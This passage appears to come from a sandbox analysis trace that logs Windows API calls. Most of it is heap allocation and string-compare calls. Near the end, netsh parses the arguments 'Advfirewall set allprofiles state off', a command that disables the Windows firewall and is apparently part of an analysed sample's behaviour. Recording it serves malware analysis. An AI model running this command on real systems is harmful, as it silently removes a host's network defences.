returned 0x0 [0180.113] GetProcessHeap () returned 0x2d0000 [0180.113] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fc080 [0180.113] GetProcessHeap () returned 0x2d0000 [0180.113] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0180.236] RegisterContext () returned 0x0 [0180.237] GetProcessHeap () returned 0x2d0000 [0180.237] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fc100 [0180.237] GetProcessHeap () returned 0x2d0000 [0180.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0180.237] RegisterContext () returned 0x0 [0180.238] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0180.238] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0180.238] GetProcessHeap () returned 0x2d0000 [0180.238] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31a4d0 [0180.238] GetProcessHeap () returned 0x2d0000 [0180.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fc100 | out: hHeap=0x2d0000) returned 1 [0180.245] RegisterContext () returned 0x0 [0180.247] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0180.247] _wcsicmp (_String1="aaaa", _String2="ipv6") returned -8 [0180.247] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0180.247] GetProcessHeap () returned 0x2d0000 [0180.247] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x150) returned 0x31d880 [0180.247] GetProcessHeap () returned 0x2d0000 [0180.247] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31a4d0 | out: hHeap=0x2d0000) returned 1 [0180.247] RegisterContext () returned 0x0 [0180.248] GetProcessHeap () returned 0x2d0000 [0180.248] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1c0) returned 0x32b090 [0180.249] GetProcessHeap () returned 0x2d0000 [0180.249] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31d880 | out: hHeap=0x2d0000) returned 1 [0180.249] RegisterContext () returned 0x0 [0180.249] GetProcessHeap () returned 0x2d0000 [0180.249] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31a4d0 [0180.249] GetProcessHeap () returned 0x2d0000 [0180.249] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fc080 | out: hHeap=0x2d0000) returned 1 [0180.250] RegisterContext () returned 0x0 [0180.250] GetProcessHeap () returned 0x2d0000 [0180.250] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x150) returned 0x31d880 [0180.250] GetProcessHeap () returned 0x2d0000 [0180.250] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31a4d0 | out: hHeap=0x2d0000) returned 1 [0180.250] RegisterContext () returned 0x0 [0180.250] GetProcessHeap () returned 0x2d0000 [0180.250] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1c0) returned 0x32b4e0 [0180.251] GetProcessHeap () returned 0x2d0000 [0180.251] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31d880 | out: hHeap=0x2d0000) returned 1 [0180.251] RegisterContext () returned 0x0 [0180.251] GetProcessHeap () returned 0x2d0000 [0180.251] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x230) returned 0x32b6b0 [0180.251] GetProcessHeap () returned 0x2d0000 [0180.251] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b4e0 | out: hHeap=0x2d0000) returned 1 [0181.539] RegisterContext () returned 0x0 [0181.540] GetProcessHeap () returned 0x2d0000 [0181.540] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x2a0) returned 0x32b8f0 [0181.540] GetProcessHeap () returned 0x2d0000 [0181.540] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b6b0 | out: hHeap=0x2d0000) returned 1 [0181.540] RegisterContext () returned 0x0 [0181.540] GetProcessHeap () returned 0x2d0000 [0181.540] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x310) returned 0x32b4e0 [0181.540] GetProcessHeap () returned 0x2d0000 [0181.540] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b8f0 | out: hHeap=0x2d0000) returned 1 [0181.541] RegisterContext () returned 0x0 [0181.541] GetProcessHeap () returned 0x2d0000 [0181.541] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fc080 [0181.541] GetProcessHeap () returned 0x2d0000 [0181.541] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0181.541] RegisterContext () returned 0x0 [0181.541] GetProcessHeap () returned 0x2d0000 [0181.541] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31a4d0 [0181.541] GetProcessHeap () returned 0x2d0000 [0181.541] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fc080 | out: hHeap=0x2d0000) returned 1 [0181.541] RegisterContext () returned 0x0 [0181.541] GetProcessHeap () returned 0x2d0000 [0181.541] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x150) returned 0x31d880 [0181.541] GetProcessHeap () returned 0x2d0000 [0181.541] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31a4d0 | out: hHeap=0x2d0000) returned 1 [0181.541] RegisterContext () returned 0x0 [0181.541] GetProcessHeap () returned 0x2d0000 [0181.541] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1c0) returned 0x32b800 [0181.541] GetProcessHeap () returned 0x2d0000 [0181.541] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31d880 | out: hHeap=0x2d0000) returned 1 [0181.542] RegisterContext () returned 0x0 [0181.542] GetProcessHeap () returned 0x2d0000 [0181.542] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x380) returned 0x32b9d0 [0181.542] GetProcessHeap () returned 0x2d0000 [0181.542] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b4e0 | out: hHeap=0x2d0000) returned 1 [0181.542] RegisterContext () returned 0x0 [0181.542] GetProcessHeap () returned 0x2d0000 [0181.542] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x3f0) returned 0x336340 [0181.542] GetProcessHeap () returned 0x2d0000 [0181.542] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b9d0 | out: hHeap=0x2d0000) returned 1 [0181.542] RegisterContext () returned 0x0 [0181.542] GetProcessHeap () returned 0x2d0000 [0181.542] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x460) returned 0x32b9d0 [0181.543] GetProcessHeap () returned 0x2d0000 [0181.543] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x336340 | out: hHeap=0x2d0000) returned 1 [0181.543] RegisterContext () returned 0x0 [0181.543] GetProcessHeap () returned 0x2d0000 [0181.543] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4d0) returned 0x336340 [0181.543] GetProcessHeap () returned 0x2d0000 [0181.543] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b9d0 | out: hHeap=0x2d0000) returned 1 [0181.543] RegisterContext () returned 0x0 [0181.543] GetProcessHeap () returned 0x2d0000 [0181.543] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fc080 [0181.543] GetProcessHeap () returned 0x2d0000 [0181.543] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0181.543] RegisterContext () returned 0x0 [0181.543] GetProcessHeap () returned 0x2d0000 [0181.543] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31a4d0 [0181.543] GetProcessHeap () returned 0x2d0000 [0181.543] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fc080 | out: hHeap=0x2d0000) returned 1 [0181.544] RegisterContext () returned 0x0 [0181.544] GetProcessHeap () returned 0x2d0000 [0181.544] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x150) returned 0x31d880 [0181.544] GetProcessHeap () returned 0x2d0000 [0181.544] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31a4d0 | out: hHeap=0x2d0000) returned 1 [0181.546] RegisterContext () returned 0x0 [0181.546] GetProcessHeap () returned 0x2d0000 [0181.546] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1c0) returned 0x32b4e0 [0181.546] GetProcessHeap () returned 0x2d0000 [0181.546] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31d880 | out: hHeap=0x2d0000) returned 1 [0181.546] RegisterContext () returned 0x0 [0181.547] GetProcessHeap () returned 0x2d0000 [0181.547] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x230) returned 0x32b9d0 [0181.547] GetProcessHeap () returned 0x2d0000 [0181.547] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b4e0 | out: hHeap=0x2d0000) returned 1 [0181.555] RegisterContext () returned 0x0 [0181.556] GetProcessHeap () returned 0x2d0000 [0181.556] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x2a0) returned 0x32b4e0 [0181.556] GetProcessHeap () returned 0x2d0000 [0181.556] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b9d0 | out: hHeap=0x2d0000) returned 1 [0181.556] RegisterContext () returned 0x0 [0181.556] GetProcessHeap () returned 0x2d0000 [0181.556] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fc080 [0181.556] GetProcessHeap () returned 0x2d0000 [0181.556] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0181.556] RegisterContext () returned 0x0 [0181.556] GetProcessHeap () returned 0x2d0000 [0181.556] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31a4d0 [0181.556] GetProcessHeap () returned 0x2d0000 [0181.556] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fc080 | out: hHeap=0x2d0000) returned 1 [0181.556] RegisterContext () returned 0x0 [0181.556] RegisterContext () returned 0x0 [0181.556] GetProcessHeap () returned 0x2d0000 [0181.556] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x310) returned 0x32b9d0 [0181.556] GetProcessHeap () returned 0x2d0000 [0181.556] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b4e0 | out: hHeap=0x2d0000) returned 1 [0181.556] RegisterContext () returned 0x0 [0181.556] GetProcessHeap () returned 0x2d0000 [0181.556] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x380) returned 0x336820 [0181.557] GetProcessHeap () returned 0x2d0000 [0181.557] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b9d0 | out: hHeap=0x2d0000) returned 1 [0181.557] RegisterContext () returned 0x0 [0181.557] GetProcessHeap () returned 0x2d0000 [0181.557] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x540) returned 0x32b9d0 [0181.557] GetProcessHeap () returned 0x2d0000 [0181.557] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x336340 | out: hHeap=0x2d0000) returned 1 [0181.557] RegisterContext () returned 0x0 [0181.557] GetProcessHeap () returned 0x2d0000 [0181.557] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x5b0) returned 0x336bb0 [0181.557] GetProcessHeap () returned 0x2d0000 [0181.557] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b9d0 | out: hHeap=0x2d0000) returned 1 [0181.557] RegisterContext () returned 0x0 [0181.557] GetProcessHeap () returned 0x2d0000 [0181.557] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x620) returned 0x337170 [0181.558] GetProcessHeap () returned 0x2d0000 [0181.558] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x336bb0 | out: hHeap=0x2d0000) returned 1 [0181.558] RegisterContext () returned 0x0 [0181.558] GetProcessHeap () returned 0x2d0000 [0181.558] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fc080 [0181.558] GetProcessHeap () returned 0x2d0000 [0181.558] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0181.558] RegisterContext () returned 0x0 [0181.558] GetProcessHeap () returned 0x2d0000 [0181.558] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x690) returned 0x3377a0 [0181.558] GetProcessHeap () returned 0x2d0000 [0181.558] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x337170 | out: hHeap=0x2d0000) returned 1 [0181.605] RegisterContext () returned 0x0 [0181.605] GetProcessHeap () returned 0x2d0000 [0181.605] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x700) returned 0x33f7e0 [0181.606] GetProcessHeap () returned 0x2d0000 [0181.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3377a0 | out: hHeap=0x2d0000) returned 1 [0184.837] RegisterContext () returned 0x0 [0184.837] GetProcessHeap () returned 0x2d0000 [0184.837] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fc480 [0184.837] GetProcessHeap () returned 0x2d0000 [0184.837] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0184.847] RegisterContext () returned 0x0 [0184.847] GetProcessHeap () returned 0x2d0000 [0184.847] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31aa70 [0184.847] GetProcessHeap () returned 0x2d0000 [0184.847] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fc480 | out: hHeap=0x2d0000) returned 1 [0184.848] RegisterContext () returned 0x0 [0184.848] GetProcessHeap () returned 0x2d0000 [0184.848] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x770) returned 0x357740 [0184.848] GetProcessHeap () returned 0x2d0000 [0184.848] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x33f7e0 | out: hHeap=0x2d0000) returned 1 [0184.848] RegisterContext () returned 0x0 [0184.848] GetProcessHeap () returned 0x2d0000 [0184.848] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fc480 [0184.848] GetProcessHeap () returned 0x2d0000 [0184.848] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0184.848] RegisterContext () returned 0x0 [0184.848] GetProcessHeap () returned 0x2d0000 [0184.848] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31ab60 [0184.848] GetProcessHeap () returned 0x2d0000 [0184.848] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fc480 | out: hHeap=0x2d0000) returned 1 [0184.848] RegisterContext () returned 0x0 [0184.849] RegisterContext () returned 0x0 [0184.849] RegisterContext () returned 0x0 [0184.849] GetProcessHeap () returned 0x2d0000 [0184.849] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x7e0) returned 0x357ec0 [0184.850] GetProcessHeap () returned 0x2d0000 [0184.851] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x357740 | out: hHeap=0x2d0000) returned 1 [0184.851] RegisterContext () returned 0x0 [0184.851] GetProcessHeap () returned 0x2d0000 [0184.851] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x850) returned 0x3586b0 [0184.852] GetProcessHeap () returned 0x2d0000 [0184.852] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x357ec0 | out: hHeap=0x2d0000) returned 1 [0184.852] RegisterContext () returned 0x0 [0184.852] GetProcessHeap () returned 0x2d0000 [0184.852] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8c0) returned 0x357740 [0184.853] GetProcessHeap () returned 0x2d0000 [0184.853] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3586b0 | out: hHeap=0x2d0000) returned 1 [0184.853] RegisterContext () returned 0x0 [0184.853] GetProcessHeap () returned 0x2d0000 [0184.853] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fc480 [0184.853] GetProcessHeap () returned 0x2d0000 [0184.853] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0184.854] RegisterContext () returned 0x0 [0184.855] GetProcessHeap () returned 0x2d0000 [0184.855] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31ad60 [0184.855] GetProcessHeap () returned 0x2d0000 [0184.855] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fc480 | out: hHeap=0x2d0000) returned 1 [0184.855] RegisterContext () returned 0x0 [0184.855] GetProcessHeap () returned 0x2d0000 [0184.855] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x150) returned 0x33f7e0 [0184.855] GetProcessHeap () returned 0x2d0000 [0184.855] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31ad60 | out: hHeap=0x2d0000) returned 1 [0184.856] RegisterContext () returned 0x0 [0184.856] GetProcessHeap () returned 0x2d0000 [0184.856] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1c0) returned 0x33f940 [0184.856] GetProcessHeap () returned 0x2d0000 [0184.856] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x33f7e0 | out: hHeap=0x2d0000) returned 1 [0184.856] RegisterContext () returned 0x0 [0184.856] GetProcessHeap () returned 0x2d0000 [0184.856] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fc480 [0184.856] GetProcessHeap () returned 0x2d0000 [0184.856] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0184.857] RegisterContext () returned 0x0 [0184.857] GetProcessHeap () returned 0x2d0000 [0184.857] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31ad60 [0184.857] GetProcessHeap () returned 0x2d0000 [0184.857] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fc480 | out: hHeap=0x2d0000) returned 1 [0184.857] RegisterContext () returned 0x0 [0184.857] GetProcessHeap () returned 0x2d0000 [0184.857] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x150) returned 0x33f7e0 [0184.857] GetProcessHeap () returned 0x2d0000 [0184.857] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31ad60 | out: hHeap=0x2d0000) returned 1 [0184.857] RegisterContext () returned 0x0 [0184.857] GetProcessHeap () returned 0x2d0000 [0184.857] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fc480 [0184.858] GetProcessHeap () returned 0x2d0000 [0184.858] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0184.858] RegisterContext () returned 0x0 [0184.858] GetProcessHeap () returned 0x2d0000 [0184.858] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fc500 [0184.858] GetProcessHeap () returned 0x2d0000 [0184.858] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0184.858] RegisterContext () returned 0x0 [0184.858] GetProcessHeap () returned 0x2d0000 [0184.858] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x930) returned 0x358010 [0184.858] GetProcessHeap () returned 0x2d0000 [0184.859] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x357740 | out: hHeap=0x2d0000) returned 1 [0184.859] RegisterContext () returned 0x0 [0184.859] GetProcessHeap () returned 0x2d0000 [0184.859] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x9a0) returned 0x358950 [0184.860] GetProcessHeap () returned 0x2d0000 [0184.860] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358010 | out: hHeap=0x2d0000) returned 1 [0188.436] RegisterContext () returned 0x0 [0188.436] GetProcessHeap () returned 0x2d0000 [0188.436] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xa10) returned 0x35df20 [0188.437] GetProcessHeap () returned 0x2d0000 [0188.437] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358950 | out: hHeap=0x2d0000) returned 1 [0188.437] RegisterContext () returned 0x0 [0188.437] GetProcessHeap () returned 0x2d0000 [0188.437] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fc680 [0188.437] GetProcessHeap () returned 0x2d0000 [0188.437] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0188.437] SetConsoleCtrlHandler (HandlerRoutine=0xd09198, Add=1) returned 1 [0188.437] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77940000 [0188.438] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0188.438] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0188.444] FreeLibrary (hLibModule=0x77940000) returned 1 [0188.444] _wcsicmp (_String1="Advfirewall", _String2="-?") returned 52 [0188.444] _wcsicmp (_String1="Advfirewall", _String2="-h") returned 52 [0188.444] _wcsicmp (_String1="Advfirewall", _String2="?") returned 34 [0188.444] _wcsicmp (_String1="Advfirewall", _String2="/?") returned 50 [0188.444] _wcsicmp (_String1="Advfirewall", _String2="-v") returned 52 [0188.444] _wcsicmp (_String1="Advfirewall", _String2="-a") returned 52 [0188.445] _wcsicmp (_String1="Advfirewall", _String2="-c") returned 52 [0188.445] _wcsicmp (_String1="Advfirewall", _String2="-f") returned 52 [0188.445] _wcsicmp (_String1="Advfirewall", _String2="-r") returned 52 [0188.445] _wcsicmp (_String1="Advfirewall", _String2="-u") returned 52 [0188.445] _wcsicmp (_String1="Advfirewall", _String2="-p") returned 52 [0188.445] GetVersionExW (in: lpVersionInformation=0x1278a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1278a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0188.445] _vsnwprintf (in: _Buffer=0xd15b80, _BufferCount=0x103, _Format="%d.%d.%d", _ArgList=0x127868 | out: _Buffer="6.1.7601") returned 8 [0188.445] _vsnwprintf (in: _Buffer=0xd15fa0, _BufferCount=0x103, _Format="%d", _ArgList=0x127868 | out: _Buffer="7601") returned 4 [0188.445] _vsnwprintf (in: _Buffer=0xd15d90, _BufferCount=0x103, _Format="%d", _ArgList=0x127868 | out: _Buffer="1") returned 1 [0188.445] _vsnwprintf (in: _Buffer=0xd161b0, _BufferCount=0x103, _Format="%d", _ArgList=0x127868 | out: _Buffer="0") returned 1 [0188.445] GetProcessHeap () returned 0x2d0000 [0188.445] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x347100 [0188.445] GetProcessHeap () returned 0x2d0000 [0188.445] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x347120 [0188.445] GetProcessHeap () returned 0x2d0000 [0188.445] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x347140 [0188.445] GetProcessHeap () returned 0x2d0000 [0188.445] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x347160 [0188.445] GetProcessHeap () returned 0x2d0000 [0188.445] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x347180 [0188.445] wcscpy_s (in: _Destination=0x347180, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0188.445] GetProcessHeap () returned 0x2d0000 [0188.445] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x347140 | out: hHeap=0x2d0000) returned 1 [0188.445] GetProcessHeap () returned 0x2d0000 [0188.445] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x347120 | out: hHeap=0x2d0000) returned 1 [0188.445] GetProcessHeap () returned 0x2d0000 [0188.445] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x347120 [0188.445] GetProcessHeap () returned 0x2d0000 [0188.445] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x347140 [0188.445] GetProcessHeap () returned 0x2d0000 [0188.445] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4c) returned 0x33d9d0 [0188.445] GetProcessHeap () returned 0x2d0000 [0188.446] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x3471a0 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x3471c0 [0188.446] wcscpy_s (in: _Destination=0x3471c0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x3588f0 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8) returned 0x31dd80 [0188.446] wcscpy_s (in: _Destination=0x31dd80, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358910 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358930 [0188.446] wcscpy_s (in: _Destination=0x358930, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358950 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x358970 [0188.446] wcscpy_s (in: _Destination=0x358970, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x358990 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8) returned 0x31dda0 [0188.446] wcscpy_s (in: _Destination=0x31dda0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x33d9d0 | out: hHeap=0x2d0000) returned 1 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x347140 | out: hHeap=0x2d0000) returned 1 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x347140 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x3589b0 [0188.446] wcscpy_s (in: _Destination=0x3589b0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3471c0 | out: hHeap=0x2d0000) returned 1 [0188.446] GetProcessHeap () returned 0x2d0000 [0188.446] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3471a0 | out: hHeap=0x2d0000) returned 1 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x3471a0 [0188.447] GetProcessHeap () returned 0x2d0000 [0188.447] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 